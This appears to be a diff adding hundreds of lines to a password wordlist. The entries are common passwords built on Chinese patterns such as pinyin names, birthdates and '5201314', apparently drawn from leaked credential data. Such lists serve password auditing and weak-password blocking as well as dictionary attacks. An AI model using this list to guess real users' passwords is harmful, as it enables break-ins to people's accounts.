+xiaojing520 +811027 +123abcdef +1988520 +831209 +123456feng +299792458a +820628 +woaixx1314 +command +xihuanni +jacky520 +gerenyinsi007 +zhanghang +beibei +198466 +820520 +zhao2008 +198524 +789456123q +xiaomao +200812 +1989928 +19831210 +aimeng1314 +superjunior +123456ccc +zhanglin +wang1979 +ming1989 +1236987a +love2011 +123456789li +ly111111 +159753a +199018 +666666qq +5201314wen +mengmeng521 +libing123 +zhenzhen520 +woai521 +888000 +xiao1314520 +19841213 +woaini121 +xiaojie +a123456z +yangtao123 +791126 +791123 +jiangbin +123456za +hyj123456 +love99 +19860722 +lihuan123 +ningning +jianglei +ning123 +lq5201314 +19851028 +wangyi521 +qazqwe123 +831014 +xh5201314 +19831006 +huazai520 +lihong123 +xing123456 +880715 +wazy1314 +qqqq0000 +daohao4sb +19901124 +821124 +q00000 +901129 +zhang0311 +imissyou1314 +880423 +19890318 +860126 +qwaszx123456 +zhanglu520 +liuhuan +851211 +890217 +xiaoyu1989 +ling520 +rabbit520 +zzw123456 +www7758521 +123456123a +9876543210 +china007 +love7758258 +123000aa +wojiushiwo123 +aiwo99 +aini1beizi +luoyang123 +19901029 +zsy123 +fang5201314 +x12345678 +31415926abc +tc123456 +gaowei123 +1992wang +deng1314 +520dandan +831020 +19831011 +19831018 +guan123 +liupeng123 +871126 +811007 +080808 +xujian520 +19891106 +nokia3250 +135791 +1233210 +123456hao +tangwei520 +19870619 +showme +821210 +821218 +kuaile +junjun521 +1314179 +wenbin123 +yingying +mingming123 +shaowei123 +851221 +851229 +nishishei +xinxin1314 +19860120 +wy5211314 +wujing123 +19841208 +800800 +132132 +851125 +3344520a +199119 +yangwei +19860927 +7758521qaz +wang0123 +123321456 +311311 +qq00000000 +dear1314 +zhao520 +malin123 +kissyou520 +890124 +12345lin +lili123 +qQ123456 +zz112233 +31415926qq +caonima2b +xiaodong123 +920920 +19911225 +cheng110 +liying521 +liqing123 +198668 +830123 +wangdan123 +li7758258 +1988911 +870817 +801201 +801208 +147741 +741741 +19880216 +lele123456 +881227 +995995 +159753qq +19870307 +19850330 +sunjian123 +1314zaiyiqi +tian1990 +asd100200 +123456op +891217 +800811 +8899174 +qwer1231 +1314520ok +111112 +668668 +aa123456aa +a5201314a +871220 +aa7758258 +318318 +19901207 +19901208 +123456000a +liuli123 +wd5211314 +19901002 +happy1990 +123abc123abc +you123 +wang1004 +860724 +ping5201314 +820819 +871202 +nba123 +841125 +19870827 +19870823 +prince +870908 +811124 +745210 +19900601 +king520 +yangyi520 +891104 +891107 +aw123456 +lilei520 +19821021 +801116 +asdf1111 +19880222 +19870114 +881130 +shuai1991 +19870315 +123123123z +19900203 +518888 +851018 +1a2a3a4a5a6a +1213141516 +angel1988 +china911 +198388 +891227 +890521 +135789 +yangkai123 +lili521 +19861018 +love01314 +890620 +123456wk +xiaobao +19890918 +121300 +666666q +yuan1984 +19871229 +a222222 +19901011 +123654q +1598753 +wu123456789 +jiangnan +simon123 +11qq11qq +liulei +198100 +860711 +w0000000 +123mtr +yangliu123 +19890228 +870911 +810618 +821123 +w3344520 +Woaini1314 +2003ub313 +liuxuan123 +891015 +891014 +1314526 +850324 +19870628 +821227 +19870128 +19870120 +19870121 +19870127 +19870124 +nowitzki41 +19860628 +881108 +wsj123456 +zhaoke123 +881224 +zz5211314 +626262 +xiaozhi123 +qwertyui +0123456789a +800830 +liuyuan123 +19861101 +1314wan +19880123 +19811215 +19891217 +weiwei1987 +820513 +xiaoyang520 +19880915 +19901225 +861013 +woshi123456 +781106 +king1981 +ly201314 +liuming123 +dragon520 +guang520 +QWEqwe123 +hy1314520 +asdfg456 +19850326 +zhaoyue123 +5201314wy +5201314wq +123150 +qazwsx12345 +830110 +841109 +19880520 +2582587758 +000000asd +841206 +lantian +19860513 +8675309a +198585 +19830906 +chen1225 +qaz741852 +zyq123456 +song4346 +831223 +jiang1991 +870608 +xx5211314 +cxf123456 +linlei520 +lili123456 +wangji +wode123456 +hujie123 +woainima123 +duoduo521 +19871104 +chenyan123 +tvxq5201314 +871219 +xiangni +xiaoke520 +19880907 +1314520qwe +861107 +zaiyiqi1314 +775521 +a999999999 +xiaojun123 +861205 +861206 +112300 +198221 +771028 +870520 +851020 +internet +liuying123 +cn123456 +yanghao123 +19870913 +19870911 +19841019 +111111asd +19890206 +angel12345 +lijin520 +mimamima +chen1995 +abc000 +zhaoyan123 +198971 +chenliang +198885 +123456xin +huangyu123 +ww000000 +lovejj1314 +zyx5201314 +yanghui123 +shihao123 +199089 +1212123 +19860103 +crystal520 +123456xxx +831117 +a5213344 +19851208 +xxxx1234 +aini123456 +yangyi12 +123444 +19841011 +1314159a +waqq1314 +google +usa911 +100859 +luyang123 +781224 +chenlong123 +19880811 +mh123456 +xuemei520 +4inlove +guojing123 +abcd1230 +781127 +19831205 +198817 +jiushiwo +xing1990 +abc112358 +duoduo123 +19870703 +beyond007 +8812345 +al123456 +jiushiaini1314 +310310 +870411 +tao5201314 +851114 +zhuang520 +198636 +woaini1981 +19870923 +dong1983 +zhangmin520 +37213721 +wo2laopo +841022 +518168 +wangdong123 +19850315 +zhangbin520 +mama123 +19890715 +loveme123 +xw5201314 +19870501 +850315 +kissme520 +19860615 +as110120 +suntao123 +w123654 +a1a2a3a4a5 +wuyan123 +541881452 +19910102 +chen521 +long1982 +19870408 +880620 +12345600 +aaa123654 +831206 +52ll1314 +wanghai123 +520babamama +h12345678 +19821122 +19851117 +19911024 +870123 +baiyang123 +880108 +19880923 +861123 +xufei520 +12345678abc +19831212 +wp5201314 +cong1987 +woaiyu1314 +wujie123 +520xiang +qwe123asd456 +liuxiao123 +19860206 +5201314jia +caocao123 +ming520 +zhangjing521 +ningning521 +111222333a +abcd2008 +987654321abc +pentium4 +server +123456lw +bendan123 +lin520 +zhy5201314 +happy1234 +203344 +850221 +db123456 +112113 +123456zm +shilei +weiwei11 +yu5211314 +long1990 +19831002 +820828 +820820 +19921215 +19891113 +a77585210 +198916 +sky123 +520jiang +901128 +zero1234 +901225 +meng1984 +860228 +831011 +19870320 +19870520 +102030aa +sweet520 +qwq123456 +216216 +851015 +ling521 +aiyang1314 +19881114 +wangji521 +xiaohai123 +19860212 +abc12345678 +w201314 +qwerasdf +liuchao520 +edison123 +liutao +321duibuqi +zhang1212 +leiyu123 +xue5201314 +123456mao +bb123123 +zhuzhu12 +19871031 +182838 +201201 +123456ye +liao123 +791010 +1234love +19861226 +19850224 +19880727 +198655 +880220 +qiqi5201314 +19880427 +chen1023 +830202 +123abc789 +jordan123 +19891203 +asd456456 +801216 +19821001 +hanlin123 +wangjin123 +821212 +19850606 +19880301 +19880305 +123456qa +zw5211314 +junjie123 +198919 +515515 +19870213 +aaaaa00000 +waiting4u +q0123456 +19840110 +891204 +891208 +851128 +fei123 +19910219 +china110 +841225 +850925 +wanghan123 +152535 +duan1980 +fangfang520 +1234567aaa +861209 +yangbo123 +cl1314520 +333888 +hero0126 +wodeai521 +890126 +dada123 +a0123456789 +841121 +552211 +wohenhao +4568520 +198322 +jiangbo520 +19880114 +200210 +liuyuan +yuhang123 +880723 +fw123456 +831031 +a1314258 +woshi90hou +880612 +yu123456789 +worinima0 +198726 +19881110 +19831127 +811018 +1988912 +kiss1989 +zhangyang520 +821108 +880813 +19850913 +19850916 +821002 +891118 +891113 +jiang888 +19870602 +7758521qw +19850718 +821205 +19880212 +19880219 +jason520 +mnbvcxz123 +123654asd +52113140 +19890812 +19870203 +810214 +kuang123 +wuqiang123 +xiaolong11 +jackson +hanyu123 +wangmin520 +123589 +daohaosi1 +jason007 +a25251325 +aaa222 +wangqian123 +123569 +871224 +1314loveyou +823823 +52bb1314 +qaz123654 +nana1314 +q2w3e4r5t6 +19841227 +dashu520 +19901008 +zhangqing +860822 +caonima38 +19871112 +meizi520 +19880106 +forget +725725 +qiu123 +wangyuan +bb521521 +19880701 +zhouyang123 +199061 +wode2008 +kobebryant +19850101 +1A2B3C4D +198715 +871108 +zhangyu1 +zhangyue +bobo1314 +123333 +880824 +880825 +zcx123456 +loveli1314 +wsad8546 +901015 +198928 +891103 +521baobao +111111zz +wangxiang +19821025 +147896 +901216 +123456al +a110120130 +11111111qq +mimashi110 +2432121 +lishuai123 +black123 +19891989 +li12345 +abcd8888 +198798 +zxzxzx +tang1985 +1987911 +shen2008 +xiao1984 +xiao1981 +147852369a +890526 +1987830 +forever20 +zxc112233 +19860806 +1314520ll +duan1234 +wuxin123 +5211314w +198428 +gd880818 +jimmy520 +123456wd +ashin751206 +198565 +adg123 +apple1314 +1234567899 +123456789yy +haiyang +zz111111 +xiaobao007 +oo00oo00 +198826 +zxc123zxc123 +junjie520 +1314happy +www123com +19880712 +159357asd +zz123321 +791023 +abcde54321 +yongyuan20 +zr123456 +1988117 +wang1012 +lzx123456 +yang1019 +fm123456 +1234567890q +asdf0000 +871016 +123321qqq +19880412 +lxh123456 +19890125 +woshi1991 +145236 +841011 +870912 +810613 +wangzhen123 +891013 +19890629 +19870129 +long12345 +aiyao1314 +wode1990 +19880512 +800125 +happy2010 +lk5201314 +19870226 +19870220 +19870223 +880104 +19820922 +19851229 +love2006 +wangchao520 +xiaohei520 +baby1234 +jinwei +wo123321 +781204 +456asd +wq1314520 +198516 +naruto123 +a12315 +zhang119 +860320 +19831231 +luo123456789 +wangyao123 +19901220 +861017 +zhangzhao +19870518 +1564335 +19870728 +861219 +liubing521 +7788945a +916916 +liuhao521 +number1 +yumiao123 +qq770880 +ss123123 +19840729 +qingfeng +19880628 +yangwei520 +zy123456789 +198615 +198616 +shan1314 +841201 +841205 +19870904 +19870905 +19870901 +1Q2W3E4R +19890218 +19890212 +abcdefg123456 +841102 +19841207 +19870805 +love201314 +19880521 +st123456 +841004 +lai123456 +shen1989 +123456789pp +sunchao123 +ghost123 +0147896325 +901124 +900126 +zx5211314 +584131421a +19870710 +woaita520 +qian1989 +zhang1018 +ql123456 +19851114 +19860510 +78963214 +831125 +12341qaz +chenqian520 +jiang1993 +fighting +232425 +leehom0517 +1234567as +19860821 +aaasss +5201314. +123123.. +zhiai1314 +hangeng521 +nokia6120c +123456789wang +123456gao +841007 +19880902 +860317 +880228 +1986123 +860116 +chenkai520 +lhy123456 +feng1990 +123456cao +880521 +880523 +5201314QQ +qingqing520 +870622 +771025 +xiangni520 +870526 +851029 +hy5201314 +789456qw +199031 +19870914 +7758521li +wodezuiai +yaojing520 +19890102 +abc123xyz +830925 +sr123456 +1981abcd +qqq123321 +198887 +garnett21 +a19871123 +song1983 +zhangjin +coolpig1 +121212a +star1234 +yy1234567 +love1019 +19840927 +ac123456 +19860105 +liu666666 +19831022 +qazplm123 +831110 +qq951753 +jiajun123 +19851204 +c12345678 +11qq11 +a111222 +gameover88 +19881209 +1qazxdr5 +11201120 +alex1984 +nishizhu2 +woaini2006 +123456.0 +buguan3721 +781226 +apple110 +zhu123123 +861116 +aiting1314 +wangning +880314 +123123qaz +198814 +zhou1994 +tongtong +qqq000 +19830407 +19870701 +19870707 +li1989 +1986315 +woai1987 +liwei123456 +112233asd +yubin123 +weichen520 +caihong123 +19890312 +19890310 +199023 +870211 +yanglei520 +19870920 +850815 +zaijian +1234aa +s12345 +yan521 +19890823 +1qw21qw2 +19840420 +810925 +19860419 +wang110 +andy123456 +527725 +wo520520 +zsj123 +52ss1314 +19890725 +2121241 +111111as +19851017 +asd010203 +qaz1wsx2 +831001 +nihao123! +menghuan +iloveyou12 +831102 +198755 +zhangkun123 +laoshu123 +19831110 +895623 +820125 +huangjian1 +xiaohui521 +wangkai520 +198813 +19850923 +h1314520 +123458 +nokia5300 +qiang1988 +qingqing123 +zxm123456 +lizhe123 +meng1992 +820525 +woaini1219 +zy5211314 +gg5201314 +xiaolan520 +zhang121 +hu123123 +huangjin +weiwei88 +19890419 +110120a +zys123456 +851002 +xiaofei521 +yin123 +hf123456 +890727 +su5201314 +iloveyou110 +woaiwozj +aaasss123 +jay1979118 +123456woaini +xingfu520 +900315 +woai520 +108108 +ouyang520 +bama520 +xu5201314 +791228 +lidan520 +781025 +yangshuai +jiang1230 +bao520 +long1991 +831015 +meimima1 +820823 +love1982 +lyf123456 +123223 +840206 +19821214 +fa123456 +zhang7758521 +ying521 +xingfu99 +19821018 +19901125 +liang2008 +mimacuowu +meng1988 +a111222333 +panasonic +19880317 +lifeng +yu1234 +19870325 +19870328 +19831220 +libin520 +xiaoming123 +weiwei1990 +qweasd11 +wys123456 +510510 +123000a +asdfgh123456 +19881119 +19890910 +850310 +xiangai1314 +xiaoxiao110 +19860213 +an1314 +tao12345 +hl5201314 +900327 +198485 +xx111111 +888888a +198988 +fish1984 +laopo1314 +qwe789qwe +19840202 +840925 +chendong +11aa22bb +yangjun +77585210a +hujian123 +123456abcdefg +19880901 +zhang1130 +860312 +qishi520 +19880729 +141592 +831022 +12345678aa +1357913579 +chen1028 +19891009 +221221 +zg123456 +811002 +19891102 +19891105 +yu111111 +love1215225 +870923 +wubin123 +19891209 +19891207 +19841127 +821014 +king2000 +xiaoke123 +zhangyang1 +19870615 +821217 +881230 +sunyanzi +chao1986 +821029 +199112 +abc789 +cisco123 +19890428 +890201 +donghae1015 +tian1987 +891206 +pengfei123 +liu520 +1987815 +321654a +student +mmm123 +zidane10 +890607 +yuanyuan00 +ainibushi23tian +yulong123 +19860321 +luobo123 +258369qq +shuang1314 +sanguo123 +19871207 +19871209 +890128 +890122 +zhang00000 +198848 +jing1986 +791206 +y88888888 +19871008 +198321 +liu1234 +xiaocheng +sz5201314 +3edcvfr4 +qing1314 +19880110 +g5201314 +19880315 +liying520 +liao1988 +147896325a +19920128 +811215 +198662 +198665 +12345678900 +880610 +ddd123456 +19831123 +19831122 +1234qweasz +snake123 +721520 +junjun +qqqq1234 +woaiwojia0 +tiancai007 +801109 +801104 +870117 +880822 +19870107 +19870108 +liu1989 +901205 +computer123 +198200 +woshishui2 +jason521 +hq5201314 +liuyifei +shy123456 +wang1215 +5201314ling +xixihaha123 +qiuyu123 +tianya520 +lj123123 +zhangqian +wangfeng1 +bobo521 +guohao123 +woai110 +jb123456 +super520 +891211 +147258qwe +141414 +890716 +19860910 +liuli520 +wangying123 +820918 +zyf123456 +19861009 +212212 +wozhidao +woaini789 +zxc159357 +860825 +yangfeng +100200cc +19880103 +sha123456 +52mm1314 +as100200 +zhangke123 +azsxdc123 +19861203 +19850205 +811223 +830212 +xy1234567 +19850103 +901215 +shagua123 +michael520 +841123 +841120 +wang12 +19880506 +miao1989 +xiaolong88 +adgjmptw123 +love1230 +5201314ying +zhangpeng123 +198871 +901012 +19850825 +19850820 +lilei521 +b1234567 +sunlei123 +s11111 +901212 +ha123456 +hehe123 +asdf1314 +123999 +chenhui +1987214 +lxm123456 +xiaomei +xiaobin123 +liuyan520 +andrew123 +19840829 +qqq111222 +mei5201314 +198797 +xiao1980 +19860801 +19860808 +5201314wan +861016 +7758521qqq +19880823 +123456wl +123456wz +xulei123 +0987654321 +q12q12q12 +198568 +zhang163 +521love521 +831226 +123jkl +456789a +a19901020 +wzh123456 +aaa555 +19851113 +1988513 +qw12er34 +songsong +ll5211314 +deng1989 +liulu521 +19870617 +a010203 +qx123456 +cheng1 +008008 +www4399com +wjh123 +nokian70 +1982abcd +198602 +198609 +51211314 +19900829 +liang1991 +QAZwsx123 +ffffff +19890126 +hetao123 +821127 +861217 +123456789qw +love1220 +891016 +aini1999 +conan1412 +901027 +peng1986 +850320 +520jiajia +19870625 +123456com +203203 +7758woaini +19870123 +1iloveyou +199221 +5201314yang +lp1314520 +wangping +19900312 +881102 +1234qwerasdf +198597 +loveless +jy5201314 +53517230 +alice123 +liwei1987 +5211314as +cyc123456 +ft123456 +qq00000 +zhang1023 +xiang5201314 +19860124 +whoami123 +liuhong +198292 +loveyou99 +helei123 +longlong521 +litao123 +zlj123456 +801130 +zhang2006 +19811011 +789456asd +811130 +liupeng +19841030 +19860810 +123568 +19861005 +shao1989 +sun1989 +147258a +aa789789 +871205 +benben +1987828 +ww1314520 +129129 +3344woaini +liuxin +19901228 +861015 +zhy123 +781103 +baobei5201314 +19830427 +jinxin520 +383838 +891007 +jj520520 +19880125 +hejie123 +19850328 +ly100200 +830312 +xiaojie521 +518598 +wangyue +wang1120 +19870907 +huyang +841106 +rainbow +zx1314 +wangyang1 +841006 +weilong123 +870822 +259775 +wowangle +wzq123456 +891127 +891125 +love1012 +19860511 +198481 +zhou1993 +881030 +jun123456 +123liu +a789456 +198696 +xiaoyang +h000000 +phoenix +831126 +132465 +yangkai +19811020 +c7758258 +ljh123456 +520china +guo5201314 +xukai123 +123456mmm +123456yao +19901113 +xx1234 +19861031 +chaoren123 +kitty520 +861108 +52junjun +qwertyu123 +wendy123 +qq168168 +feng1991 +123456cai +880524 +19890221 +123456789j +1987abcd +zhanglei1 +zhanglei0 +860616 +gaojian123 +xiaoxiao1314 +830321 +830325 +199151 +19860220 +19860221 +19870918 +7758521qwe +19890202 +edison +19890107 +cy1314520 +810914 +csq123456 +wmda1314 +19890601 +loveyy1314 +aa1122 +198499 +kangkang +wanghao520 +19860707 +zhangyao +chenliang1 +zhang1001 +594188 +renjie123 +831115 +198768 +zeng1987 +min1314520 +daohaoqu4 +shenjian +qqww1122 +167669123a +850122 +xiaozi123 +yuan1991 +liping123 +bbs12345 +198277 +sunny1987 +820916 +xiaomin123 +19880813 +880113 +ting1314 +ly123456789 +928928 +861115 +wangwang123 +19830205 +99999999 +880316 +cherry +781122 +781121 +a123s123 +198816 +edward123 +184816 +snoopy +woshihaoren123 +821230 +110220 +870618 +hao123com +123123jj +123456cw +samsung1 +a19901124 +19860313 +lf1314520 +891213 +891212 +123456he +110123 +aa123aa +19891204 +198632 +199026 +1314520asd +ys5201314 +52myself +870216 +yiwang1314 +yuan521 +19870924 +mima520 +zhangchen +wocaonima1314 +missyou520 +123abcdefg +19821007 +loveforever +711s9d31 +810929 +19890712 +dabao521 +1122qq +zhoujun123 +885522 +yanghui1 +huashi911 +xiaozhu1 +xianjian3 +12311231 +lzw123456 +jiangfeng +mm521521 +wuchao520 +1985chen +xuan123456 +1234569 +820128 +820127 +820121 +123456jk +19841101 +19841103 +816816 +zhujian123 +hexin123 +h1314521 +bing123 +19821126 +880920 +xiaoxiao12 +lixin521 +a555555 +wocaonima2 +zzc123 +binbin +xiaojian1 +19880921 +19880925 +831124 +831128 +1989629 +123321qw +19870516 +521babamama +194910 +lili1234 +1989927 +huanghao +zhangfeng +ying123456 +012345 +ling123456 +dl5201314 +851203 +851209 +han5201314 +sunny1314 +861229 +z00000000 +ming1987 +ming1986 +as741852 +851006 +panpan521 +19870818 +yang9264 +a19891022 +19881102 +12345679a +357951 +870303 +850909 +ab12cd34 +cheng1981 +123456zp +1a2s3d4f5g6h +zhangjing520 +liuhao +870915 +mz123456 +198999 +198997 +1415926535 +a123456. +woxihuan1 +123456zs +c5211314 +890922 +890929 +abcd1234abcd +dd123123 +000ooo000 +linda123 +19861231 +xiaozhi520 +a1212112 +851117 +831010 +jackie +david520 +yy100200 +222111 +820821 +820826 +19921213 +love1980 +19891115 +831218 +heihei +775852100 +chenyu520 +19821218 +123321as +1986921 +821025 +801228 +365365 +liuliang +acmilan1899 +sunxiao123 +801123 +801125 +860522 +871001 +meng1987 +1qazwsxedc +winner123 +qq12345qq +xiaohai +happyday +1985928 +a778899 +19890518 +lanlan521 +likai521 +wodeshijie +890213 +890219 +821220 +19880307 +ASDasd123 +lp000000 +yuyan520 +851012 +851017 +7758258aa +qwe123zxc +520777 +19890911 +199102 +19910304 +1987622 +19790118jay +1987525 +820318 +wozhiaini1314 +aaa112233 +520apple +wohenaini1 +900525 +weiqiang +cc19850719 +900324 +dallas41 +twins520 +aaa520 +890119 +zhou1982 +521xinxin +qb123456 +791210 +520214 +s123456s +791018 +20031226tvxq +123456ooo +cheng000 +811209 +hong1987 +198657 +wangrui521 +19831013 +19880426 +asd741852 +mylove22 +zhangjie521 +19891004 +gj123456 +226226 +820914 +820911 +19891104 +840219 +781018 +891023 +19851230 +198909 +821215 +199212 +1987625 +a135792468 +gaofeng +19900324 +13243546 +19870330 +qqqqqq111 +mengmeng123 +qwert67890 +880329 +woshi188 +jianren123 +woainia521 +19860122 +890203 +123456fei +qaz1234567 +liu521 +801128 +870422 +870429 +19790118 +system +lilong123 +fang1990 +liukai123 +850924 +19860926 +shiyan123 +19860320 +19860322 +xiaohao520 +weili123 +820211 +asdfjkl123 +beyond1993 +123123mm +liuyong123 +woaini5566 +liqian520 +19871206 +kelly520 +qwqw123 +19841231 +890123 +901220 +chrdw123 +11211121 +z1h2a3n4g5 +ycl123456 +caonimabi123 +123456xw +123456xp +5211314asd +aini1234 +19870829 +1a2a3a4a5a +19911224 +19911222 +liubo521 +xsw2zaq1 +fendou123 +xiaoxi1314 +pp5211314 +811212 +811214 +518918 +123jiang +lining +wo131420 +880615 +830128 +123456AA +636363 +110520 +asd521 +19891216 +880816 +zhutou520 +123456mj +19850910 +19850914 +821007 +laoda123 +jiang1023 +891111 +xiaoliu123 +19821030 +901105 +901102 +821203 +zhang2009 +880215 +ZXCVBNM +aini2009 +19850512 +411411 +19900214 +mei123456 +donghao123 +wang1213 +19890819 +xiaozhang1 +ping1314 +manager +19870207 +19870206 +19870202 +520cheng +worinima11 +780116 +asd123520 +o123456 +tw123456 +2008woaini +pa55w0rd +liutong123 +333777 +123123. +small123 +yongyuan520 +5201314000 +zhang1978 +820715 +199125 +199121 +ting5201314 +xiaojing +121518 +qwe7758521 +5201314xue +456852qq +chenjian520 +wangmin123 +louis520 +861031 +159357456 +19841223 +19841226 +801012 +19901007 +820319 +820310 +860826 +lover520 +19911217 +woaini159 +830219 +abc147258369 +123qweQWE +19850102 +19880401 +7758521ok +198719 +198716 +198717 +19870822 +19880501 +123211 +lijing +xiaolu520 +woshi1989 +yuwei520 +jianghua +890216 +676767 +210000 +huang321 +901014 +wangle +haohao521 +1314512 +1q1q2w2w +chenrui123 +wd5201314 +huangjian +19880226 +zhaobin123 +881217 +liqin123 +benzhu520 +cc1234 +zhang0123 +19870312 +19870314 +jiangtao +7758520a +happy2009 +kobe0823 +19851985 +yamap19850409 +liuwei1314 +love999 +sunjian +xiao1987 +850616 +19811001 +19850926 +19860803 +www1234567 +19860905 +aile1314 +520myself +1987516 +133133 +beckham07 +19880820 +ligen123 +qian1314 +daiwei123 +wuhao520 +19890915 +19890916 +900518 +1314520love +ljc123456 +chenyang123 +840815 +198829 +19901017 +guan123456 +gameover +900916 +1989108 +123qwe!@# +66dashun +123qaz456wsx +whoami +guolei123 +1988116 +456123aa +111111w +lifeng520 +199055 +19831207 +xxx5201314 +841217 +780311 +baozi123 +qiqi123 +1986520 +daniel123 +wangfan123 +19890220 +418418 +841130 +19870813 +1986823 +1988613 +apple001 +meng1314 +12345qqq +dandan12 +1988412 +7758258w +19870620 +19890622 +19860527 +211985 +19870126 +001002003 +fang1314 +19860626 +maxiao123 +881109 +zhang112 +xiaowu1314 +1987101 +dai123 +1990wang +19860125 +19860121 +19851121 +123456lt +wxl123456 +guoliang +198298 +ww7758521 +lwl123456 +jiao520 +520258 +zl5211314 +wangjuan +jiandan +19860812 +820714 +830218 +w00000000 +871206 +811001 +xiaoyang521 +fang1985 +wang2005 +123123Aa +woaiwojia2 +362000 +525jia +angela +abcd0000 +king1987 +19870423 +wo3344520 +19870720 +zbc850726 +000520 +zf5201314 +liwei1985 +liwei1986 +caonima12 +caonima13 +19850422 +liuhuan521 +19880129 +1988928 +caonima748 +1988101 +19880623 +19880624 +zhang1216 +maomao1985 +wokaoni88 +5201314wl +841204 +871029 +871023 +19900811 +sb123123 +841103 +xuyan123 +810709 +sunsun123 +19870806 +831203 +1993wang +123654aaa +841001 +841002 +110110110a +19890502 +butterfly +a584131420 +810907 +8975789757 +sl5201314 +11aa11 +wangyang12 +ling0000 +19860518 +910909 +810127 +1991zhang +zhangyuan +jifeng123 +886688 +19890827 +19890829 +19840815 +wocao110 +dd5211314 +1987116 +1987119 +19860112 +871230 +shilei520 +1234567ab +7758258love +andy1111 +831228 +zhoujun520 +wodengni1314 +tk123456 +19911008 +001987 +5201314h +wjh123456 +123123qqq +860514 +19871109 +wuwei520 +dong520 +781215 +781210 +zjy123 +880126 +19880909 +860310 +880223 +wsad123456 +19851112 +a520520520 +19870415 +117117 +angle520 +198800 +801025 +123456jian +feng1993 +welcome1 +victor +123789abc +1988218 +jinjian123 +880526 +198832 +zxc1234567 +19920420 +860817 +1989123 +1989122 +1989129 +wangjun1 +123963 +chen123456789 +4rfv5tgb +198624 +199032 +wxj123456 +19890205 +841118 +luoluo123 +why5201314 +aa12345678 +zxcvbnm1234567 +dj5201314 +nihaoma521 +qing5201314 +guokai123 +jun1314520 +liudan123 +13579abcde +tommy123 +woaixiao +wujia123 +caonima250 +zs123123 +19860502 +1982wang +1987429 +890328 +hello2008 +whl123456 +nj123456 +gong123 +19860705 +woshinima +zheng110 +chen1213 +yanyan +19851007 +19840922 +19840928 +19820808 +zxc110 +19860108 +qq11223344 +xiaozi520 +19851105 +19851101 +jiangnan520 +shuaige520 +005200 +19851206 +19851207 +19851209 +xiaoqi1987 +850629 +wang456852 +666333 +zzh5201314 +starcraft2 +123546 +woaini2009 +xiaoting520 +A123456a +820412 +yang4978 +huang000 +520110 +198419 +198418 +qq0123456 +19880818 +123456tl +880110 +qw789456 +qwe111 +tian520 +hjy123456 +860207 +321321321 +lian123456 +19870504 +19870506 +880315 +781128 +1234567l +1234567d +cg123456 +gf5201314 +jian1984 +123456asdfg +fuckyou0 +198736 +861230 +861231 +880519 +870616 +hewei520 +870924 +860926 +nirvana +yunyun123 +tan123 +shabi250 +zhou520 +mima94mima +zzj123456 +800525 +19890316 +a19851223 +198639 +198637 +870210 +wanghao110 +hk123456 +19870922 +comeon123 +flying123 +525525 +529529 +shevchenko7 +841026 +mm123456789 +abcd1234a +qwe321321 +122600 +zhoudan123 +monica520 +bigbang +limeng123 +jack1988 +1986118 +19880611 +aizj1314 +zheng007 +vivian123 +25802580 +a789789 +cuso45h2o +19820819 +198993 +iloveyou11 +831104 +lxf123 +840110 +602602 +zhoujielun +a5845211314 +jiayi123 +222888 +liufei520 +19821222 +19821226 +198603 +19850921 +19850925 +820625 +880923 +19911026 +xiang1991 +xiang1990 +xiuxiu521 +wocaonima8 +momo1314 +liujie +198469 +wasd12345 +meng1990 +860211 +19880322 +123456su +liling123 +198522 +198527 +abcdefg1234567 +gaohan123 +px123456 +861126 +880206 +880203 +880208 +asd00123 +Q1W2E3R4 +880306 +19831218 +19831217 +19831214 +zyl123456 +456123abc +bb000000 +861226 +861222 +880506 +x7758258 +nihao888 +pt123456 +zxy520 +wo1234 +liyang888 +ws5201314 +chenxi521 +kong123456 +yangguang1 +890726 +890725 +maggie +asqw1234 +li31415926 +25251325a +yang0000 +gaoyu123 +xuwei521 +123456cj +qq123520 +jianren520 +19850501 +870914 +lijia520 +huangjie123 +a789789789 +19890723 +19900520 +killer47 +p1234567 +love1024 +ayumi520 +lc5201314 +791129 +wutao123 +890921 +19860721 +19860725 +jiushi123 +wang110120 +meiyoumima123 +chen1111 +19831108 +manman123 +wu1314520 +19891112 +831214 +880322 +123huang +1314520s +811102 +liuyang1991 +ming5201314 +tangwei +q110110 +19860822 +andylau +19841118 +19821219 +19821217 +yangbin520 +040506 +19821015 +19901128 +yongheng +19880310 +12345678s +niqusiba +w123456y +ss5211314 +wuhan520 +zsy123456 +890420 +880213 +654321asd +fuckyou1314 +lpf123456 +789654123 +860122 +870714 +851217 +34416912a +Love1314 +123852 +andy1988 +quan1986 +sun123sun +890414 +a123b123 +wei1314521 +5221314 +woaideren +520333 +ck123456 +sdfjkl123 +chencheng +liqiang521 +xihuan123 +19840601 +wsx123456 +900527 +onepiece +wei123456789 +19910426 +198981 +19841209 +7758521wang +19840203 +19900917 +13800138000 +zhangxu521 +like123 +wwj123456 +wushuang1 +li123321 +19851031 +1314520xin +guojiao1573 +19880720 +19880728 +831023 +198652 +19841114 +19831016 +147258369q +19891007 +19891101 +19891103 +870928 +870922 +kimi1015 +880804 +as5211314 +lirui520 +zhangwei521 +ps123456 +19850906 +891028 +1986911 +123321z +lovejing1314 +801211 +wjj123456 +mylove521 +qw7758521 +1990526 +881231 +100861 +19850609 +taotao +kuaile99 +19900522 +why1314520 +qq1314159 +123a321 +1314520yy +52331314 +880327 +880323 +0000000q +shanshan1 +880422 +shen1234 +870720 +851222 +jianren +1986320 +abcdef1234 +nhce111 +talent123 +wozhiaini +yangyang1314 +a19891109 +zhu520 +lizhi521 +1989wang +19840112 +1987819 +890405 +19910211 +353535 +199117 +850922 +19860920 +huangchao +friend +jack1987 +good123456 +19881222 +duan1986 +789512357 +000000. +a85208520 +11259375 +zhang159357 +tony1986 +duibuqi88 +missyou123 +worinima1314 +woshi001 +woshi008 +sw5201314 +lanse521 +5217758 +5201314cy +19841230 +lgh123456 +890127 +19840216 +880916 +guoguo +791202 +jj123123 +820325 +820327 +199288 +liushuai123 +19911220 +wangning123 +AA123456 +19880319 +333520 +love211314 +liufeng +13579qetuo +chen2436 +1989419 +jjbh89757 +daohao488 +820806 +qing520 +xf1314520 +19831129 +19880515 +951753aa +1015062e +821102 +aaaaaaa1 +zwq123456 +880810 +840329 +821008 +19821111 +19900616 +830621 +801205 +aixiao1314 +52mingming +fdsa1234 +zxc789456 +821207 +821209 +19880211 +198453 +198455 +liu1987 +hmily520 +guodong521 +123456po +ainibubian +chen0000 +mimacuowu123 +19901110 +jiayu123 +zhao1983 +a1213123 +wd7758521 +sn123456 +bobo520 +198271 +19870429 +wangcong +lovexx1314 +c111111 +windows110 +830611 +198398 +891216 +sunjie123 +19820125 +521369 +200000 +athlon64 +qwer7894 +123456cui +1w1w1w1w +871222 +198571 